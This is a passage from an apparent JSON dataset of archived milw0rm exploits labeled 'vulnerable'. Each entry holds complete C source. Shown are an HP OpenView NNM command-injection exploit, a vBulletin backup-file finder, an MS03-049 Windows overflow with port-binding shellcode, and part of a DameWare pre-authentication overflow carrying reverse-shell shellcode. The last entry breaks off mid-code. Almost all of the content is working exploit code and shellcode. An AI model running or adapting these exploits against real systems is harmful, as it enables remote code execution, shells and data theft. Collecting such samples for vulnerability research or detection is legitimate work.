#\n\n############################################################################\n\n\n\n*/\n\n\n\n//headers\n\n#include <stdio.h>//In/Out\n\n#include <winsock2.h>//sockets functions\n\n#include <stdlib.h>//memory functions\n\n#include <string.h>//strlen,strcat,strcpy\n\n\n\n#pragma comment(lib,\"ws2_32.lib\") //for compile with dev-c++ link to \"libws2_32.lib\"\n\n\n\n#define Port 3443 //port for connect to HP OV NNM\n\n#define SIZE 2048 //buffer size to receive the data\n\n\n\n/*connect host:port*/\n\nSOCKET Conecta(char *Host, short puerto)\n\n{\n\n\t/*struct for make the socket*/\n\n\tWSADATA wsaData;\n\n\tSOCKET Winsock;//listener socket\n\n\t/*two structures for connect*/\n\n\tstruct sockaddr_in Winsock_In;\n\n\tstruct hostent *Ip;\n\n\n\n\t/*start the socket*/\n\n\tWSAStartup(MAKEWORD(2,2), &wsaData);\n\n\t/*make*/\n\n\tWinsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);\n\n\n\n\t//check socket status\n\n\tif(Winsock==INVALID_SOCKET)\n\n\t{\n\n\t\t/*exit*/\n\n\t\tWSACleanup();\n\n\t\treturn -1;\n\n\t}\n\n\n\n\t/*complete the struct*/\n\n\tIp=gethostbyname(Host);\n\n\tWinsock_In.sin_port=htons(puerto);\n\n\tWinsock_In.sin_family=AF_INET;\n\n\tWinsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));\n\n\n\n\t/*connect*/\n\n\tif(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)\n\n\t{\n\n\t\t/*end*/\n\n\t\tWSACleanup();\n\n\t\treturn -1;\n\n\t}\n\n\n\n\treturn Winsock;\n\n}\n\n\n\n/*MASTER FUNCTION*/\n\nint main(int argc, char *argv[])\n\n{\n\n\t/*the socket*/\n\n\tSOCKET sock;\n\n\t/*make the evil buffer to send the request*/\n\n\tchar evil_request[]=\"GET /OvCgi/connectedNodes.ovpl?node=a| \";\n\n\tchar evil_request2[]=\" |\";\n\n\tchar *evil;\n\n\t/*to receive the data*/\n\n\tchar buf[SIZE];\n\n\tunsigned int i;\n\n\n\n\tprintf(\"\\n +[ HP OV NNM Remote Command Execution ]+ by Lympex\");\n\n    printf(\"\\nContact: lympex[at]gmail[dot]com & http://l-bytes.net\");\n\n\tprintf(\"\\n-----------------------------------------------------\\n\");\n\n\n\n\tif(argc!=3)//HP_OV_NNM_RCE <host> <command>\n\n\t{\n\n\t\tprintf(\"\\n[+] Usage: %s <host> <command>\",argv[0]);\n\n\t\tprintf(\"\\nImportant: Do not include \\x22<\\x22 and \\x22>\\x22 chars\\n\");\n\n\t\treturn 0;\n\n\t}\n\n\n\n\tfor(i=0;i<strlen(argv[2]);i++)\n\n\t{\n\n\t\tif(argv[2][i]=='<' || argv[2][i]=='>')\n\n\t\t{\n\n\t\t\tprintf(\"\\n[!] Error - You have included \\x22<\\x22 and/or \\x22>\\x22 chars\\n\");\n\n\t\t\treturn 1;\n\n\t\t}\n\n\t}\n\n\n\n\tprintf(\"\\n[+] Connecting  %s:%d...\",argv[1],Port);\n\n\n\n\t/*start the exploit*/\n\n\tsock=Conecta(argv[1],Port);//connect\n\n\tif(sock==-1)\n\n\t{\n\n\t\tprintf(\"Error\\n\");\n\n\t\treturn 1;\n\n\t}\n\n\n\n\tprintf(\"OK\");\n\n\n\n\t/*make the EVIL request*/\n\n\tevil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));\n\n\tstrcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,\"\\n\\n\");\n\n\n\n\t//sends it\n\n\tsend(sock,evil,strlen(evil),0);\n\n\n\n\tbuf[recv(sock,buf,SIZE,0)]='\\0';\n\n\n\n\t//show the data\n\n\tprintf(\"\\n\\n------- [Result] -------\\n\\n%s\\n------- [/Result] -------\\n\",buf);\n\n\n\n\tWSACleanup();\n\n\tLocalFree(buf);\n\n\tLocalFree(evil);\n\n\treturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-08-30]",
985        "vulnerable": true
986    },
987    {
988        "exploit_id": 1189,
989        "content": "/*\n\n * Needed to pentest a few vBulletin forums so I wrote this junk real quick.\n\n * Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html\n\n * Good paths: /forum/ / /forum/archive/ /forum/cpadmin/\n\n * Update 1: Code error fixes. /str0ke (str0ke@milw0rm.com)\n\n * Update 2: Fixed datestring-version for international boards by hals1 (h4ls4bschn31d3r@gmx.net)\n\n * Update 3: French vBulletin boards added by Tyn0r (tyn0r@atxteam.net)\n\n * /str0ke\n\n */\n\n\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n#include <netdb.h>\n\n#include <stdio.h>\n\n#include <unistd.h>\n\n\n\n#define SERVER_PORT 80\n\n\n\nchar *getdate(int b){\n\n\tstatic char datestring[40];\n\n\ttime_t ttt;\n\n        int minustime;\n\n\tminustime=86400 * b;\n\n\tttt=time(NULL)- minustime;\n\n\tstrftime (datestring, sizeof(datestring), \"%m-%d-%Y\", localtime(&ttt));\n\n\tprintf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n\treturn(datestring);\n\n}\n\n\n\nchar *getdate2(int b){\n\n        static char datestring[40];\n\n        time_t ttt;\n\n        int minustime;\n\n        minustime=86400 * b;\n\n        ttt=time(NULL)- minustime;\n\n        strftime (datestring, sizeof(datestring), \"%Y-%d-%m\", localtime(&ttt));\n\n        printf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n        return(datestring);\n\n}\n\n\n\nchar *getdate3(int b){\n\n        static char datestring[40];\n\n        time_t ttt;\n\n        int minustime;\n\n        minustime=86400 * b;\n\n        ttt=time(NULL)- minustime;\n\n        strftime (datestring, sizeof(datestring), \"%d-%m-%Y\", localtime(&ttt));\n\n        printf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n        return(datestring);\n\n}\n\n\n\nchar *getdate4(int b){\n\n\tstatic char datestring[40];\n\n\ttime_t ttt;\n\n        int minustime;\n\n\tminustime=86400 * b;\n\n\tttt=time(NULL)- minustime;\n\n\tstrftime (datestring, sizeof(datestring), \"%m.%d.%Y\", localtime(&ttt)); // hals1\n\n\tprintf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n\treturn(datestring);\n\n}\n\n\n\nchar *getdate5(int b){\n\n        static char datestring[40];\n\n        time_t ttt;\n\n        int minustime;\n\n        minustime=86400 * b;\n\n        ttt=time(NULL)- minustime;\n\n        strftime (datestring, sizeof(datestring), \"%Y.%d.%m\", localtime(&ttt)); // hals1\n\n        printf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n        return(datestring);\n\n}\n\n\n\nchar *getdate6(int b){\n\n        static char datestring[40];\n\n        time_t ttt;\n\n        int minustime;\n\n        minustime=86400 * b;\n\n        ttt=time(NULL)- minustime;\n\n        strftime (datestring, sizeof(datestring), \"%d.%m.%Y\", localtime(&ttt)); // hals1\n\n        printf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n        return(datestring);\n\n}\n\n\n\nchar *getdate7(int b){\n\n        static char datestring[40];\n\n        time_t ttt;\n\n        int minustime;\n\n        minustime=86400 * b;\n\n        ttt=time(NULL)- minustime;\n\n        strftime (datestring, sizeof(datestring), \"%d%m%Y\", localtime(&ttt)); // Tyn0r\n\n        printf(\"Searching: forumbackup-%s.sql\\n\", datestring);\n\n        return(datestring);\n\n}\n\n\n\nmain(int argc, char *argv[]) {\n\n\n\n char buffer[1000],host[255],path[255],dog[255],c;\n\n int sd, rc, i=0, d=0, b;\n\n struct sockaddr_in localAddr, servAddr;\n\n struct hostent *h;\n\n\n\nchar *http =\n\n         \"Accept: */*\\r\\n\"\n\n         \"Accept-Language: en-us,en;q=0.5\\r\\n\"\n\n         \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\n\n         \"User-Agent: we want your backups - milw0rm\\r\\n\"\n\n         \"Connection: close\\r\\n\\r\\n\";\n\n\n\nif ( argc != 5) {\n\n\t        printf(\"vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.com\\n\");\n\n\t        printf(\"usage: %s -h hostname/ip -p /path/ \\n\",argv[0]);\n\n\t        exit(0);\n\n}\n\n\n\n\n\n while ((c = getopt (argc, argv, \"h:p:\")) != EOF)\n\n       switch(c)\n\n       {\n\n               case 'h':\n\n                       strncpy(host,optarg,sizeof(host));\n\n                       break;\n\n               case 'p':\n\n                       strncpy(path,optarg,sizeof(path));\n\n                       break;\n\n       }\n\n\n\n h = gethostbyname(host);\n\n \n\n if(h==NULL) {\n\n   printf(\"Unknown Host '%s'\\n\",host);\n\n   exit(1);\n\n }\n\n\n\n printf(\"Trying To Connect To [%s]\\n\",host);\n\n while(1){\n\n servAddr.sin_family = h->h_addrtype;\n\n memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\n\n servAddr.sin_port = htons(SERVER_PORT);\n\n sd = socket(AF_INET, SOCK_STREAM, 0);\n\n \n\n if(sd<0) {\n\n   perror(\"Can Not Open The Socket\\n\");\n\n   exit(1);\n\n }\n\n\n\n localAddr.sin_family = AF_INET;\n\n localAddr.sin_addr.s_addr = htonl(INADDR_ANY);\n\n localAddr.sin_port = htons(0);\n\n\n\n rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));\n\n \n\n if(rc<0) {\n\n   printf(\"%d: cannot bind port TCP %u\\n\",sd,SERVER_PORT);\n\n   perror(\"error \");\n\n   exit(1);\n\n }\n\n\n\n rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));\n\n\n\n if(rc<0) {\n\n   perror(\"cannot connect\\n\");\n\n   exit(1);\n\n }\n\n   memset(buffer,0,sizeof(buffer));\n\n\n\n   if ( d == 0 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate(i),host,http);\n\n   } else if ( d == 1 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate2(i),host,http);\n\n   } else if ( d == 2 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate3(i),host,http);\n\n   } else if ( d == 3 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate4(i),host,http);\n\n   } else if ( d == 4 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate5(i),host,http);\n\n   } else if ( d == 5 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate6(i),host,http);\n\n   } else if ( d == 6 ) {\n\n   snprintf(buffer,sizeof(buffer), \"HEAD %s/forumbackup-%s.sql HTTP/1.1\\r\\nHost: %s\\r\\n%s\",path,getdate7(i),host,http);\n\n   }\n\n\n\n   rc = send(sd,buffer, strlen(buffer), 0);\n\n   memset(buffer,0,sizeof(buffer));\n\n\n\nwhile(1)\n\n       {\n\n       rc=recv(sd,buffer,sizeof(buffer),0);\n\n       if(strstr(buffer,\"404\")) break;\n\n       if(strstr(buffer,\"200 OK\"))\n\n               {\n\n\t       if ( d == 0 ) {\n\n               printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate(i));\n\n\t       }\n\n\t       if ( d == 1 ) {\n\n               printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate2(i));\n\n\t       }\n\n\t       if ( d == 2 ) {\n\n               printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate3(i));\n\n\t       }\n\n\t       if ( d == 3 ) {\n\n\t       printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate4(i));\n\n\t       }\n\n\t       if ( d == 4 ) {\n\n\t       printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate5(i));\n\n\t       }\n\n\t       if ( d == 5 ) {\n\n\t       printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate6(i));\n\n\t       }\n\n\t       if ( d == 6 ) {\n\n\t       printf(\"Database backup found: %s%sforumbackup-%s.sql\\n\", host, path, getdate7(i));\n\n\t       }\n\n               exit(0);\n\n               }\n\n       memset(buffer,0,sizeof(buffer));\n\n       }\n\nclose(sd);\n\n\n\nif ( d < 6 ) {\n\n\td++;\n\n} else {\n\n\td=0;\n\n        i++;\n\n}\n\n}\n\n}\n\n\n\n// milw0rm.com [2005-08-31]",
990        "vulnerable": true
991    },
992    {
993        "exploit_id": 119,
994        "content": "/*\n\n        Proof of concept for MS03-049.\n\n        This code was tested on a Win2K SP4 with FAT32 file system, and is supposed\n\n        to work *only* with that (it will probably crash the the other 2Ks, no clue\n\n        about XPs).\n\n\n\n        To be compiled with lcc-win32 (*hint* link mpr.lib) ... I will not improve\n\n        this public version, do not bother to ask.\n\n        \n\n        Credits go to eEye\n\n        See original bulletin for more information, it is very well documented.\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <win.h>\n\n#include <string.h>\n\n\n\ntypedef int (*MYPROC)(LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, ULONG);\n\n\n\n#define SIZE 2048\n\n\n\n// PEX generated port binding shellcode (5555)\n\nunsigned char shellcode[] =\n\n\"\\x66\\x81\\xec\\x04\\x07\" // sub sp, 704h\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x19\\x5e\\x31\"\n\n\"\\xc9\\x81\\xe9\\xa6\\xff\\xff\\xff\\x81\\x36\\x76\\xac\\x7c\\x25\\x81\\xee\\xfc\"\n\n\"\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\\x9e\\x94\\x7c\\x25\"\n\n\"\\x76\\xef\\x31\\x61\\x76\\x4b\\x05\\xe3\\x0f\\x49\\x35\\xa3\\x3f\\x08\\xd1\\x0b\"\n\n\"\\x9f\\x08\\x66\\x55\\xb1\\x75\\x75\\xd0\\xdb\\x67\\x91\\xd9\\x4d\\x22\\x32\\x2b\"\n\n\"\\x9a\\xd2\\xa4\\xc7\\x05\\x01\\xa5\\x20\\xb8\\xde\\x82\\x96\\x60\\xfb\\x2f\\x17\"\n\n\"\\x29\\x9f\\x4e\\x0b\\x32\\xe0\\x30\\x25\\x77\\xf7\\x28\\xac\\x93\\x25\\x21\\x25\"\n\n\"\\x1c\\x9c\\x25\\x41\\xfd\\xad\\xf7\\x65\\x7a\\x27\\x0c\\x39\\xdb\\x27\\x24\\x2d\"\n\n\"\\x9d\\xa0\\xf1\\x72\\x5a\\xfd\\x2e\\xda\\xa6\\x25\\xbf\\x7c\\x9d\\xbc\\x16\\x2d\"\n\n\"\\x28\\xad\\x92\\x4f\\x7c\\xf5\\xf7\\x58\\x76\\x2c\\x85\\x23\\x02\\x48\\x2d\\x76\"\n\n\"\\x89\\x98\\xf3\\xcd\\xe6\\xac\\x7c\\x25\\x2f\\x25\\x78\\xab\\x94\\x47\\x4d\\xda\"\n\n\"\\x10\\x2d\\x90\\xb5\\x77\\xf8\\x14\\x24\\x77\\xac\\x7c\\xda\\x23\\x8c\\x2b\\x72\"\n\n\"\\x21\\xfb\\x3b\\x72\\x31\\xfb\\x83\\x70\\x6a\\x25\\xbf\\x14\\x89\\xfb\\x2b\\x4d\"\n\n\"\\x74\\xac\\x69\\x96\\xff\\x4a\\x16\\x35\\x20\\xff\\x83\\x70\\x6e\\xfb\\x2f\\xda\"\n\n\"\\x23\\xb8\\x2b\\x73\\x25\\x53\\x29\\x35\\xff\\x6e\\x1a\\xa4\\x9a\\xf8\\x7c\\xa8\"\n\n\"\\x4a\\x88\\x4d\\xe5\\x1c\\xb9\\x25\\xd6\\xdd\\x25\\xab\\xe3\\x32\\x88\\x6c\\x61\"\n\n\"\\x88\\xe8\\x58\\x18\\xff\\xd0\\x58\\x6d\\xff\\xd0\\x58\\x69\\xff\\xd0\\x58\\x75\"\n\n\"\\xfb\\xe8\\x58\\x35\\x22\\xfc\\x2d\\x74\\x27\\xed\\x2d\\x6c\\x27\\xfd\\x83\\x50\"\n\n\"\\x76\\xfd\\x83\\x70\\x46\\x25\\x9d\\x4d\\x89\\x53\\x83\\xda\\x89\\x9d\\x83\\x70\"\n\n\"\\x5a\\xfb\\x83\\x70\\x7a\\x53\\x29\\x0d\\x25\\xf9\\x2a\\x72\\xfd\\xc0\\x58\\x3d\"\n\n\"\\xfd\\xe9\\x40\\xae\\x22\\xa9\\x04\\x24\\x9c\\x27\\x36\\x3d\\xfd\\xf6\\x5c\\x24\"\n\n\"\\x9d\\x4f\\x4e\\x6c\\xfd\\x98\\xf7\\x24\\x98\\x9d\\x83\\xd9\\x47\\x6c\\xd0\\x1d\"\n\n\"\\x96\\xd8\\x7b\\xe4\\xb9\\xa1\\x7d\\xe2\\x9d\\x5e\\x47\\x59\\x52\\xb8\\x09\\xc4\"\n\n\"\\xfd\\xf6\\x58\\x24\\x9d\\xca\\xf7\\x29\\x3d\\x27\\x26\\x39\\x77\\x47\\xf7\\x21\"\n\n\"\\xfd\\xad\\x94\\xce\\x74\\x9d\\xbc\\xac\\x9c\\xf3\\x22\\x78\\x2d\\x6e\\x74\\x25\";\n\n\n\nunsigned char jmp[] =\n\n\"\\xe9\\x6f\\xfd\\xff\\xff\"; // jmp -290h to land in the payload\n\n\n\nint main(void)\n\n{\n\n        int ret;\n\n        HINSTANCE hInstance;\n\n        MYPROC procAddress;\n\n        char szBuffer[SIZE];\n\n        NETRESOURCE netResource;\n\n\n\n        netResource.lpLocalName = NULL;\n\n        netResource.lpProvider = NULL;\n\n        netResource.dwType = RESOURCETYPE_ANY;\n\n        netResource.lpRemoteName = \"\\\\\\\\192.168.175.3\\\\ipc$\";\n\n\n\n        ret = WNetAddConnection2(&netResource, \"\", \"\", 0); // attempt a null session\n\n        if (ret != 0)\n\n        {\n\n                fprintf(stderr, \"[-] WNetAddConnection2 failed\\n\");\n\n                return 1;\n\n        }\n\n\n\n        hInstance = LoadLibrary(\"netapi32\");\n\n        if (hInstance == NULL)\n\n        {\n\n                fprintf(stderr, \"[-] LoadLibrary failed\\n\");\n\n                return 1;\n\n        }\n\n\n\n        procAddress = (MYPROC)GetProcAddress(hInstance, \"NetValidateName\"); // up to you tocheck NetAddAlternateComputerName\n\n        if (procAddress == NULL)\n\n        {\n\n                fprintf(stderr, \"[-] GetProcAddress failed\\n\");\n\n                return 1;\n\n        }\n\n\n\n        memset(szBuffer, 0x90, sizeof(szBuffer));\n\n        memcpy(&szBuffer[1400], shellcode, sizeof(shellcode) - 1);\n\n        // ebp @ &szBuffer[2013]\n\n        *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63; // eip (jmp esp @ msafd.dll, useopcode search engine for more, but\n\n                      // be aware that a call esp willchange the offset in the stack)\n\n        memcpy(&szBuffer[2021 + 12], jmp, sizeof(jmp)); // includes terminal NULL char\n\n        ret = (procAddress)(L\"\\\\\\\\192.168.175.3\", szBuffer, NULL, NULL, 0);\n\n\n\n        WNetCancelConnection2(\"\\\\\\\\192.168.175.3\\\\ipc$\", 0, TRUE);\n\n        FreeLibrary(hInstance);\n\n\n\n        return 0;\n\n}\n\n\n\n// milw0rm.com [2003-11-12]",
995        "vulnerable": true
996    },
997    {
998        "exploit_id": 1190,
999        "content": "/************************************************************************************************\n\n*                            _                   ______\n\n*                           (_)___  ____  ____  / ____/\n\n*                          / / __ \\/ __ \\/ __ \\/___ \\\n\n*                         / / /_/ / / / / /_/ /___/ /\n\n*                      __/ / .___/_/ /_/\\____/_____/\n\n*                     /___/_/======================\n\n*************************************************************************************************\n\n*\n\n*                                       DameWare Mini Remote Control Client Agent Service\n\n*                                               Another Pre-Authentication Buffer Overflow\n\n*                                                                By Jackson Pollocks No5\n\n*                                                                         www.jpno5.com\n\n*\n\n*\n\n*       Summary\n\n*               +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n*               DameWare Mini Remote Control is \"A lightweight remote control intended primarily\n\n*               for administrators and help desks for quick and easy deployment without\n\n*               external dependencies and machine reboot.\n\n*\n\n*               Developed specifically for the 32-bit Windows environment (Windows 95/98/Me/NT/2000/XP),\n\n*               DameWare Mini Remote Control is capable of using the Windows challenge/response authentication\n\n*               and is able to be run as both an application and a service.\n\n*\n\n*               Some additional features include View Only, Cursor control, Remote Clipboard, Performance Settings,\n\n*               Inactivity control, TCP only, Service Installation and Ping.\"\n\n*\n\n*               A buffer overflow vulnerability can be exploited remotely by an unauthenticated attacker\n\n*               who can access the DameWare Mini Remote Control Server.\n\n*\n\n*               By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP.\n\n*               An attacker can construct a specialy crafted packet and exploit this vulnerability.\n\n*               The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.\n\n*\n\n*\n\n*       Severity:   Critical\n\n*\n\n*       Impact:         Code Execution\n\n*\n\n*       Local:          Yes\n\n*\n\n*       Remote:         Yes\n\n*\n\n*       Patch:          Download version 4.9.0 or later and install over your existing installation.\n\n*                               You can download the latest version of your DameWare Development Product at\n\n*                               http://www.dameware.com/download\n\n*\n\n*       Details:        Affected versions will be any ver in above 4.0 and prior to 4.9\n\n*                               of the Mini Remote Client Agent Service (dwrcs.exe).\n\n*\n\n*       Discovery:  i discovered this while using the dameware mini remote control client.\n\n*                               i accidently pasted in a large string of text instead of my username.\n\n*                               Clicking connect led to a remote crash of the application server.\n\n*\n\n*       Credits:        Can't really remember who's shellcode i used, more than likely it was\n\n*                               written by Brett Moore.\n\n*\n\n*                               The egghunter was written by MMiller(skape). {Which kicks ass btw}\n\n*\n\n*                               Thanks to spoonm for tracking that NtAccessCheckAndAuditAlarm\n\n*                               universal syscall down.\n\n*\n\n*                               Some creds to Adik as well, i did code my own exploit but it had none\n\n*                               of that fancy shit like OS and SP detection. So basicly i just modded\n\n*                               the payload from the old dameware exploit(ver 3.72).\n\n*\n\n*                               A little cred to me as well, after all i did put all them guys great\n\n*                               work together to make something decent :)\n\n*\n\n************************************************************************************/\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <winsock.h>\n\n\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\n#define ACCEPT_TIMEOUT  25\n\n#define RECVTIMEOUT             15\n\n\n\n#define UNKNOWN         0\n\n#define WIN2K           1\n\n#define WINXP           2\n\n#define WIN2K3          3\n\n#define WINNT           4\n\n\n\n               unsigned char rshell[] = {\n\n       \"\\x41\\x42\\x41\\x42\\x41\\x42\\x41\\x42\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"// For The Egghunter\n\n       \"\\x90\\xFC\\x6A\\xEB\\x52\\xE8\\xF9\\xFF\\xFF\\xFF\\x60\\x8B\\x6C\\x24\\x24\\x8B\"// Reverse Shell\n\n       \"\\x45\\x3C\\x8B\\x7C\\x05\\x78\\x01\\xEF\\x83\\xC7\\x01\\x8B\\x4F\\x17\\x8B\\x5F\"\n\n       \"\\x1F\\x01\\xEB\\xE3\\x30\\x49\\x8B\\x34\\x8B\\x01\\xEE\\x31\\xC0\\x99\\xAC\\x84\"\n\n       \"\\xC0\\x74\\x07\\xC1\\xCA\\x0D\\x01\\xC2\\xEB\\xF4\\x3B\\x54\\x24\\x28\\x75\\xE3\"\n\n       \"\\x8B\\x5F\\x23\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\\x5F\\x1B\\x01\\xEB\\x03\\x2C\"\n\n       \"\\x8B\\x89\\x6C\\x24\\x1C\\x61\\xC3\\x31\\xC0\\x64\\x8B\\x40\\x30\\x8B\\x40\\x0C\"\n\n       \"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\x68\\x8E\\x4E\\x0E\\xEC\\x50\\xFF\\xD6\"\n\n       \"\\x31\\xDB\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD0\"\n\n       \"\\x68\\xCB\\xED\\xFC\\x3B\\x50\\xFF\\xD6\\x5F\\x89\\xE5\\x66\\x81\\xED\\x08\\x02\"\n\n       \"\\x55\\x6A\\x02\\xFF\\xD0\\x68\\xD9\\x09\\xF5\\xAD\\x57\\xFF\\xD6\\x53\\x53\\x53\"\n\n       \"\\x53\\x43\\x53\\x43\\x53\\xFF\\xD0\\x68\\x90\\x90\\x90\\x90\\x66\\x68\\x90\\x90\"\n\n       \"\\x66\\x53\\x89\\xE1\\x95\\x68\\xEC\\xF9\\xAA\\x60\\x57\\xFF\\xD6\\x6A\\x10\\x51\"\n\n       \"\\x55\\xFF\\xD0\\x66\\x6A\\x64\\x66\\x68\\x63\\x6D\\x6A\\x50\\x59\\x29\\xCC\\x89\"\n\n       \"\\xE7\\x6A\\x44\\x89\\xE2\\x31\\xC0\\xF3\\xAA\\x95\\x89\\xFD\\xFE\\x42\\x2D\\xFE\"\n\n       \"\\x42\\x2C\\x8D\\x7A\\x38\\xAB\\xAB\\xAB\\x68\\x72\\xFE\\xB3\\x16\\xFF\\x75\\x28\"\n\n       \"\\xFF\\xD6\\x5B\\x57\\x52\\x51\\x51\\x51\\x6A\\x01\\x51\\x51\\x55\\x51\\xFF\\xD0\"\n\n       \"\\x68\\xAD\\xD9\\x05\\xCE\\x53\\xFF\\xD6\\x6A\\xFF\\xFF\\x37\\xFF\\xD0\\x68\\xE7\"\n\n       \"\\x79\\xC6\\x79\\xFF\\x75\\x04\\xFF\\xD6\\xFF\\x77\\xFC\\xFF\\xD0\\x68\\xEF\\xCE\"\n\n       \"\\xE0\\x60\\x53\\xFF\\xD6\\xFF\\xD0\"\n\n       };\n\n\n\n               unsigned char buff[40] = {\n\n       \"\\x30\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\xC3\\xF5\\x28\\x5C\\x8F\\xC2\\x0D\\x40\"// OS Detection\n\n       \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n       \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n\n       };\n\n\n\n               unsigned char fpay[] = {\n\n       \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"// Egghunter\n\n       \"\\xef\\xb8\\x41\\x42\\x41\\x42\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n\n       \"\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\\xcc\"\n\n};\n\n\n\n\n\nlong ip(char *hostname);\n\nvoid shell (int sock);\n\n\n\nint check(char *host,unsigned short tport, unsigned int *sp);\n\n\n\nstruct timeval tv;\n\nfd_set fds;\n\nchar buff1[5000]=\"\";\n\n\n\nstruct spl{\n\n       unsigned long eip; char off[20];\n\n};\n\n\n\nstruct{\n\n       char type[10]; struct spl sp[7];\n\n}\n\n\n\ntarget_os[]={{  //Could proberly be doing with some better offsets\n\n       \"UNKNOWN\"  ,{{ 0x00000000,\"unknown.dll\"  },{ 0x00000000,\"unknown.dll\" },{ 0x00000000,\"unknown.dll\" },{ 0x00000000,\"unknown.dll\"  },{ 0x00000000,\"unknown.dll\"  },{ 0x00000000,\"unknown.dll\" },{ 0x00000000,\"unknown.dll\"  }}},{\n\n       \"WIN 2000\" ,{{ 0x750362c3,\"ws2_32.dll\"   },{ 0x75035173,\"ws2_32.dll\"  },{ 0x7C2FA0F7,\"ws2_32.dll\"  },{ 0x7C2FA0F7,\"advapi32.dll\" },{ 0x7C2FA0F7,\"advapi32.dll\" },{ 0x00000000,\"unknown.dll\" },{ 0x00000000,\"unknown.dll\"  }}},{\n\n       \"WIN XP\"   ,{{ 0x71ab7bfb,\"kernel32.dll\" },{ 0x71ab7bfb,\"ws2_32.dll\"  },{ 0x7C941EED,\"ws2_32.dll\"  },{ 0x00000000,\"unknown.dll\"  },{ 0x00000000,\"unknown.dll\"  },{ 0x00000000,\"unknown.dll\" },{ 0x00000000,\"unknown.dll\"  }}},{\n\n       \"WIN 2003\" ,{{ 0x77E216B8,\"advapi32.dll\" },{ 0x77FD1F89,\"ntdll.dll\"   },{ 0x77E216B8,\"ntdll.dll\"   },{ 0x77E216B8,\"advapi32.dll\" },{ 0x00000000,\"unknown.dll\"  },{ 0x00000000,\"unknown.dll\" },{ 0x00000000,\"unknown.dll\"  }}},{\n\n       \"WIN NT4\"  ,{{ 0x77777777,\"unknown.dll\"  },{ 0x77777776,\"unknown.dll\" },{ 0x77777775,\"unknown.dll\" },{ 0x77f326c6,\"kernel32.dll\" },{ 0x77777773,\"unknown.dll\"  },{ 0x77777772,\"unknown.dll\" },{ 0x77f32836,\"kernel32.dll\" }}}\n\n};\n\n\n\nint main(int argc,char *argv[])\n\n{\n\n               WSADATA wsaData;\n\n               struct sockaddr_in targetTCP, localTCP, inAccTCP;\n\n               int sockTCP,s,localSockTCP,accSockTCP, acsz,switchon;\n\n\n\n               unsigned char packet[24135]=\"\";\n\n               unsigned short lport, tport;\n\n               unsigned long lip, 